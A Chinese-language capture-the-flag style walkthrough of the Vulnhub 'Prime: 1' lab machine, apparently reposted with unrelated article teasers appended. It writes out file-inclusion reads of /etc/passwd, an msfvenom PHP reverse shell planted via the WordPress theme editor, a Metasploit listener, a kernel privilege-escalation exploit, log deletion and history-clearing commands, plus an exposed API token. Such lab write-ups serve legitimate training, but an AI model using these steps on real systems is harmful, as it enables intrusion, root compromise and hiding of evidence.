Vulnhub | 实战靶场渗透测试 - PRIME: 1

news2025/1/9 16:57:58

0x00 免责声明

        本文仅限于学习讨论与技术知识的分享,不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任,一旦造成后果请自行承担!

        

        

0x01 前言

        这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。

        

        

0x02 环境说明

攻击机:Kali linux(192.168.239.128)
靶机:Prime1(192.168.239.129)
项目地址:https://www.vulnhub.com/entry/prime-1,358
靶机显示内容

        

        文中使用 Kali linux 2022.1 系统在虚拟机 NAT 网络的环境下进行示范。演示过程中使用到的工具均在 Kali 系统中自带安装。关于靶场环境可以访问项目地址进行下载学习。

        

        

0x03 端口扫描

使用 arp-scan 命令扫描局域网主机,发现目标端口为 192.168.239.129 。这里的主机发现主要是通过排除法进行的,其中 1、2、254 都是已知设备。

arp-scan -l

        

使用 nmap 命令查看目标端口和服务的开放情况,发现开放 22ssh 端口和 80http 端口, 22 端口和 80 端口一般都是爆破和漏洞利用两个点。

nmap -p 1-65535 -A 192.168.239.129

        

        

0x04 目录扫描

浏览器访问目标 IP ,靶场设计者就给了一个图片,有可能在图片中可以找到一些重要信息,这里先记录一下,如果最后实在没有思路的时候就尝试一下。首先检查了网页源代码并没有可用信息。

        

使用 dirb 对目标站点的目录扫描看看,结果发现 dev 和 index.php 目录以及一些其他目录文件。

dirb http://192.168.239.129/

        

浏览器访问 dev 目录发现一段提示。

翻译内容:

你好,

你现在处于 0 级阶段。

在真实的环境中,我们应该使用工具不断尝试挖掘漏洞。

加油,黑客。

        

        

0x05 指纹识别

使用 cmseek 工具对刚刚目录扫描出来的后台系统进行指纹信息收集。

cmseek -u http://192.168.239.129/wordpress

        

        

0x06 后缀扫描

对网页进行后缀扫描,检查此网页是否存在源代码泄露,发现网站存在几个泄露文件。

dirb http://192.168.239.129 -X .html,.zip,.txt,.php,.tmp,.rar,.tgz,.tar,.git,.svn,.bak,.doc,.docx,.xls,.xlsx,.PPTX,.PDF,.jpg,.png,.GIF,.jar

        

使用浏览器访问前面几个泄露文件,检查发现并没有什么可用信息。当访问最后一个文件时,发现第二个提示。

翻译内容: 

看来,你发现了一些秘密。

那么,我就给你一点提示。

在你找到的 php 的每一页上尝试使用 fuzz 。

如果找到任何正确的参数,那么你可以继续探索。

如果仍然卡在此处,那么你应该学习一下对 OSCP 的使用。
//看到了 location.txt 那你就可以继续探索//

        

        

0x07 模糊测试

使用 fuzz 查找 image.php 中的参数,因为在刚刚的后缀扫描中我们分别扫出了 image.php index.php 文件,那么我们要将两个文件都进行模糊测试。避免错过重要信息。

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.239.129/image.php?FUZZ

        

对参数进行过滤,过滤行数、字和字符均未发现可用的有效信息,过滤方法是将表格中的 Lines 和 Word 以及 Chars 的相同信息进行屏蔽。

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 12 --hh 147 http://192.168.239.129/image.php?FUZZ

        

再次使用 fuzz 查找 index.php 中的参数,对参数进行过滤,发现可用参数 "file" ,猜测页面可能存在文件包含漏洞。

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 12 --hh 147 http://192.168.239.129/index.php?FUZZ

        

        

0x08 文件包含漏洞

使用浏览器查看账户信息测试一下参数,测试了 common.txt 和 phpinfo.php 以及一些刚刚扫描到的目录信息等均显示此页面。说明存在文件包含漏洞,注意在网页下方有一处提示,说明还有一个文件可以获取到有用的信息。

翻译内容: 

做的很好,

你打开的文件是错的。

        

渗透测试常见敏感信息路径: 

路径地址路径描述
/etc/passwd账户信息文件
/etc/shadow账户密码文件
/usr/local/app/php5/lib/php.iniPHP相关配置文件
/etc/httpd/conf/httpd.confApache配置文件
/usr/local/app/apache2/conf/httpd.confApache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf虚拟网站配置文件
/etc/my.confmysql 配置文件

        

根据网页提示说打开的文件是错误的,那么肯定还有一个文件没有访问到,也许这个文件中存在着重要信息。但是这个文件目前还不能确定是不是已经收集到的信息,所以先对收集到的信息做一个简单的梳理。通过检查获取到的信息发现在第二处提示的时候告诉我们 "看到了 location.txt 那你就可以继续探索" 

        

根据提示信息二给出的思路将访问路径更改为 location.txt 进行访问,结果发现新的提示,告诉我们在 php 页面中使用 secrettier360 参数会有新发现。 

翻译内容: 

不错,现在你知道正确的参数了,

现在对下一个在进行进行挖掘,

在其他 php 页面上使用 secrettier360 参数可以获得更多乐趣。

        

分别使用 index.php 文件和 image.php 文件通过 file 查看 secrettier360 参数到底有什么。

翻译内容: 

最后,你得到了正确的参数

        

使用 fuzz 测试一下 secrettier360 看看能不能有新的发现,这里在对 index.php 进行模糊测试时并未过滤出有效信息。但是之前在执行后缀扫描时还有一个 image.php 没有使用到,这里检查一下这个文件,看看是否可以获取到有效信息。

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.239.129/image.php?secrettier360=FUZZ

        

进行过滤查找,发现可用参数 "dev"

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 17 --hh 197 http://192.168.239.129/image.php?secrettier360=FUZZ

        

使用获得的参数对浏览器访问,发现一处新的提示,也许这就是作者要将新发现藏在 image 文件中的原因吧。

翻译内容: 

最后,你得到了正确的参数

你好,你现在处于 0 级阶段。在真实的环境中,我们应该使用工具不断尝试挖掘漏洞。加油,黑客。

        

提示说已经正确了,那么我们可以通过检查常见的敏感信息路径,判断目标站点是否存在敏感信息泄露,从而发现目标的泄露信息。在上文中有对渗透测试常见敏感信息路径做一个简要的汇总,如有需要可以回顾上文进行查看。

curl http://192.168.239.129/image.php?secrettier360=/etc/passwd

        

将代码拖入编译器可以方便审查,在检查过程中,发现在 /home/saket 路径中有一个关于 password.txt 的文件。

find password.txt file in my directory:/home/saket

        

在浏览器中访问 /home/saket 路径,检查一下这个 txt 文件看看是否有密码数据。发现一个提示,还是说得到了正确的参数,但是后面一句是 follow_the_ippsec

翻译内容: 

最后,你得到了正确的参数

follow_the_ippsec

        

        

0x09 后台登录

在刚才的信息收集时,目标站点还有一个 wordpress 博客管理系统,但是我一直没有访问这个系统。直到刚刚拿到了一个信息是 "follow_the_ippsec" ,才发现这个可能是登录的密码。使用浏览器访问 wordpress ,在页面中查看到一个用户名为 victor

        

通过获得的密码,尝试登录 wordpress ,结果可以成功登录系统后台。

        

        

0x10 漏洞扫描

利用漏扫工具扫描 wordpress 查看是否存在漏洞,发现漏洞挺多,其中有一个标题为: WordPress 5.2.2 - 存储评论的跨站脚本攻击(XSS) ,那么可以尝试生成一个shell文件上传到评论中。利用 xss 漏洞的特性去访问这个数据时漏洞则会执行。 wpscan 漏扫工具最后一串字符要输入自己的 API 密钥,关于 API 密钥可以在 wpscan 官网中注册获得。

wpscan --url http://192.168.239.129/wordpress --disable-tls-checks --api-token rOCN4Wxw3LdnBaPExsChadlEzbGvgd11uDUdMfqn3dg

        

        

0x11 MSF反弹Shell

使用 msf 创建一个 shell 文件,可以和本地 Kali 系统的 7777 端口进行连接。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.239.128 lport=7777 -o shell.php

        

查看 shell.php 文件中的代码。

        

        

0x12 漏洞利用

访问主题编辑器中的 Appearance中 的 Theme Editor 。可以看到这是一个上传点。

        

找到了一个后缀是 php 的文件,那么我们可以写一个 shell 进行文件上传。

        

在上文中已经使用 msf 写了一个 shell 文件,那么直接复制粘贴即可。最后点击更新文件提升成功更新了文件。

        

使用 msfconsole 命令访问 msf 终端。

msfconsole

        

设置监听端口,建立本地 Kali 与目标计算机的远程连接。

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.239.128
set lport 7777
exploit

        

当浏览器成功访问刚刚上传的 shell 文件路径时, msf 即可成功连接。

http://192.168.239.129/wordpress/wp-content/themes/twentynineteen/secret.php

        

        

0x13 获取主机信息

查看目标用户 ID 信息。

getuid

        

查看目标计算机系统信息。

sysinfo

        

        

0x14 系统漏洞搜索

使用 msf 搜索看看 Ubuntu 16.04 系统有没有什么潜在的漏洞,在搜索中发现 Linux Kernel < 4.13.9 (ubuntu 16,04 / Fedora 27) - Local ,这个是 linux 的一个内核漏洞。我对 linux 内核安全还不够熟悉,所以去看了一些别的文章了解到可以用这个漏洞进行权限提升。

searchsploit 16.04 Ubuntu

        

        

0x15 权限提升

使用命令访问 45010.c 的文件路径。

cd /usr/share/exploitdb/exploits/linux/local

        

检索是否有这个文件,发现 45010.c 文件。

ls 45010*

        

复制 45010.c 文件到根目录中。

cp 45010.c ../../../../../../

        

返回到根目录查看 45010.c 文件。

cd ../

        

复制 45010.c 文件,重命名为 45010 。

gcc 45010.c -o 45010

        

上传木马文件到目标服务器中,使用 tmp 路径是因为这个路径是可以共享的。

upload /45010 /tmp/45010

        

使用 shell 命令访问目标计算机系统。

shell

        

打开 tmp 路径查看发现刚刚的木马文件成功传入目标计算机。

cd /tmp

        

使用 chmod +x 45010 命令,来执行权限提升。

chmod +x 45010

        

运行 45010 文件执行木马,获得目标系统的权限。

./45010

        

ⅩⅠ执行 whoami 命令显示目标计算机用户的用户名。

whoami

        

ⅩⅡ检查目标系统目录中发现的几个 txt 文件,至此已经完成了权限提升。

cat enc.txt
cat key.txt
cat root.txt

        

        

0x16 痕迹清理

使用 rm -rf 命令可以强制删除文件,后面的是一些日志路径以及指定这个日期进行删除。

rm -rf /var/run/utmp-2023-06-01 /var/log/wtmp-2023-06-01 /var/log/lastlog-2023-06-01 /var/log/btmp-2023-06-01 /var/log/auth.log-2023-06-01 /var/log/secure-2023-06-01 /var/log/maillog-2023-06-01 /var/log/message-2023-06-01 /var/log/cron-2023-06-01 /var/log/spooler-2023-06-01 /var/log/boot.log-2023-06-01

        

关于痕迹清理的相关命令:

命令描述
histroy -r删除当前会话历史记录
history -c删除内存中的所有命令历史
export HISTFILE=/dev/null export HISTSIZE=0以 root 执行,可以不记录命令

        

        

0x17 参考文献

[1].魏钦6666. Prime(wfuzz模糊测试,CVE-2017-16695)[EB/OL]. [2023-06-01]. https://blog.csdn.net/m0_66299232/article/details/127404497?spm=1001.2014.3001.5502.

[2].红萝卜绿萝卜. 0x01--Prime_Series_Level-1靶场[EB/OL]. [2023-06-01]. https://blog.csdn.net/weixin_43742395/article/details/120323256.

[3].小孔吃不胖. Vulnhub靶场Prime_Series_Level-1渗透[EB/OL]. [2023-06-01]. https://blog.csdn.net/m0_65712192/article/details/128914895.

[4].清尘大哥. 渗透测试之痕迹清除[EB/OL]. [2023-06-01]. https://blog.csdn.net/qq_29864185/article/details/107059909.

[5].蜜罐小明哥. 安全研究 | 后渗透阶段清理痕迹方式总结[EB/OL]. [2023-06-01]. https://www.freebuf.com/articles/system/266458.html.

[6].linuxsec. 提权总结以及各种利用姿势[EB/OL]. [2023-06-01]. https://www.cnblogs.com/linuxsec/articles/11966287.html.

        

        

0x18 总结

由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/599430.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

“本草”大模型开源,ChatGPT时代,连AI私人医生都出现了?

大家好,我是千与千寻,也可以叫我千寻,今天给大家分享的ChatGPT新应用项目,是ChatGPT模型在医学领域的应用,什么,医学领域? 是的,没错,是医学领域的ChatGPT应用,我们都知道ChatGPT是OpenAI开源的一个智能对话式引擎,今天给大家分享的项目叫“本草”。 “本草”模型是…

IIC协议与OLED

1.认识OLED 1、OLED概述&#xff1a; OLED&#xff08;Organic Light-Emitting Diode&#xff0c;有机发光二极管&#xff09;是一种显示技术&#xff0c;利用有机材料的发光特性来产生光。OLED显示器由一系列有机材料层组成&#xff0c;当电流通过时&#xff0c;这些材料会发…

【性能调优】真实体验 “系统调用是重开销”

实践背景是开发云原生背景下的指纹识别插件&#xff0c;主要针对的是镜像、容器等云时代的软件资产。 信息安全语境下的 指纹识别 指的是定位软件的特征&#xff0c;如名称、版本号、开源许可证等&#xff0c;就像指纹是人的独特生物凭证&#xff0c;这些特征是软件的独特电子凭…

六一儿童节 全网最全的微服务+Outh2套餐,你确定不来试一试?(入门到精通,附源码)满足你的味蕾需要(二)

咱们废话不多说&#xff0c;直接开干&#xff01;&#xff01;&#xff01; 目录 一、项目目录 二、Token 三、授权服务器oauth 1.pom 2.application 3.OauthApp启动类 4.DiyUserDetails 5.MyUserDetailService 6.KeyPairController 7.TokenConfig 8.WebSecurityCo…

LNMP架构

LNMP架构 一、LNMP架构原理二、LNMP部署1、安装 Nginx 服务1.安装依赖包2.创建运行用户3.编译安装4.优化路径5.添加 Nginx 系统服务 2、安装 MySQL 服务1.安装Mysql环境依赖包2.创建运行用户3.编译安装4.修改mysql 配置文件5.更改mysql安装目录和配置文件的属主属组6.设置路径环…

电子模块|压力传感器模块HX711---硬件介绍

电子模块|压力传感器模块HX711---硬件介绍与C51&&STM32驱动 实物照片模块简介模块特点 硬件模拟输入供电电源时钟选择串口通讯复位和断电HX711相关部分的 PCB 设计 实物照片 模块简介 HX711是一款专为高精度称重传感器而设计的24位A/D转换器芯片。与同类型其它芯片相比…

后端接口调式工具

后端接口调式工具 目录概述需求&#xff1a; 设计思路实现思路分析1.Postman2.Swagger 文档测试工具3.Sniff 文档测试工具4.APIpost 参考资料和推荐阅读 Survive by day and develop by night. talk for import biz , show your perfect code,full busy&#xff0c;skip hardne…

【SCADA】启动KingSCADA运行系统,提示加载报警库服务失败?

大家好&#xff0c;我是雷工&#xff01; 今天启动KingSCADA时&#xff0c;发现无法运行&#xff0c;提示“加载 报警库服务 失败”&#xff0c;现将问题排查及解决问题的过程记录如下。 一、问题描述&#xff1a; 1、提示如下图&#xff1a; 2、信息窗口提示&#xff1a; …

性能测试从零开始落地实施全过程指南之性能测试计划怎么写?

目录 前言 一、测试背景 二、测试目的 三、测试范围 四、术语约定 五、环境说明 六、需求分析 七、测试策略 八、准备工作 九、组织架构 十、风险分析 十一、交付清单 十二、阶段进度 前言 最近有些同学找我咨询关于性能测试计划相关的问题&#xff0c;原因是他们…

《C++ list的模拟实现》

本文主要介绍list容器的模拟实现 文章目录 1、迭代器正向迭代器类反向迭代器类 2、push_back尾插函数3、 push_front头插函数4、 insert插入函数5、erase删除函数6、pop_front函数7、pop_back函数8、 构造函数9、 拷贝构造函数10、 list赋值重载函数11、clear12、 析构函数程序…

AI注册流程

1、首先需要有一个OpenAI账号&#xff0c;如果有方法的&#xff0c;就可以自己先注册一下。如果没有方法的&#xff0c;还有一个付费版本的可以备选&#xff0c;亲测可用。 2、注册建议使用谷歌账号关联登录&#xff0c;最方便。微软账号太慢了&#xff0c;也可以使用。注册使用…

SAP-MM库存进销存报表

1、总览&#xff1a; 事务代码MB5B是查询选择期间之内的收发存报表&#xff1b; 其中&#xff0c;收、发为汇总选择期间的收、发信息&#xff0c;存为选择期间的期初、期末库存数据&#xff1b;我们也可以用该报表查询历史上某一天的库存&#xff0c;但注意有一些限制条件。 …

【Selenium】提高测试爬虫效率:Selenium与多线程的完美结合

前言 使用Selenium 创建多个浏览器&#xff0c;这在自动化操作中非常常见。 而在Python中&#xff0c;使用 Selenium threading 或 Selenium ThreadPoolExecutor 都是很好的实现方法。 应用场景&#xff1a; 创建多个浏览器用于测试或者数据采集&#xff1b;使用Selenium…

Region Proposal Network (RPN) 架构详解

动动发财的小手&#xff0c;点个赞吧&#xff01; 简介 如果您正在阅读这篇文章[1]&#xff0c;那么我假设您一定听说过用于目标检测的 RCNN 系列&#xff0c;如果是的话&#xff0c;那么您一定遇到过 RPN&#xff0c;即区域提议网络。如果您不了解 RCNN 系列&#xff0c;那么我…

Github copilot的详细介绍,竞品比对分析,效率使用方法总结。

Copilot介绍&#xff0c;与竞品对比 Copilot是GitHub和OpenAI合作开发的一款人工智能代码助手&#xff0c;它可以根据用户输入的注释和代码片段&#xff0c;自动生成高质量的代码。Copilot使用了OpenAI的GPT模型&#xff0c;可以学习和理解大量的代码库和文档&#xff0c;从而…

javascript基础十三:说说 typeof 与 instanceof 区别?

一、typeof typeof 操作符返回一个字符串&#xff0c;表示未经计算的操作数的类型 举个粟子&#xff1a; typeof 1 number typeof 2 string typeof undefined undefined typeof false boolean typeof Symbol() symbol typeof null object typeof [] object typeof {} object…

TCP传输性能的关键因素除了流量控制,还有这些!

TCP网络通信基本原理 文章目录 TCP网络通信基本原理TCP效率&#xff08;滑动窗口&#xff09;流量控制拥塞控制延时应答捎带应答 面向字节流异常情况分析总结UDP/TCP特性与不同应用场景 TCP效率&#xff08;滑动窗口&#xff09; 滑动窗口&#xff1a;在TCP通信协议下&#xf…

【UnityShader入门精要】【总结记录】【第二章-2】

☀️博客主页&#xff1a;CSDN博客主页 &#x1f4a8;本文由 萌萌的小木屋 原创&#xff0c;首发于 CSDN&#x1f4a2; &#x1f525;学习专栏推荐&#xff1a;面试汇总 ❗️游戏框架专栏推荐&#xff1a;游戏实用框架专栏 ⛅️点赞 &#x1f44d; 收藏 ⭐留言 &#x1f4dd;&a…

1901-2021年1km分辨率逐月最高气温栅格数据(全国/分省)

气温数据是我们最常用的气象指标之一&#xff0c;之前我们给大家分享过来源于国家青藏高原科学数据中心提供的1901-2021年1km分辨率逐月平均气温栅格数据&#xff08;可查看之前的文章获悉详情&#xff09;&#xff01; 本次我们分享的同样是来自国家青藏高原科学数据中心的高…

【探索】在 JavaScript 中使用 C 程序

JavaScript 是个灵活的脚本语言&#xff0c;能方便的处理业务逻辑。当需要传输通信时&#xff0c;我们大多选择 JSON 或 XML 格式。 但在数据长度非常苛刻的情况下&#xff0c;文本协议的效率就非常低了&#xff0c;这时不得不使用二进制格式。 去年的今天&#xff0c;在折腾…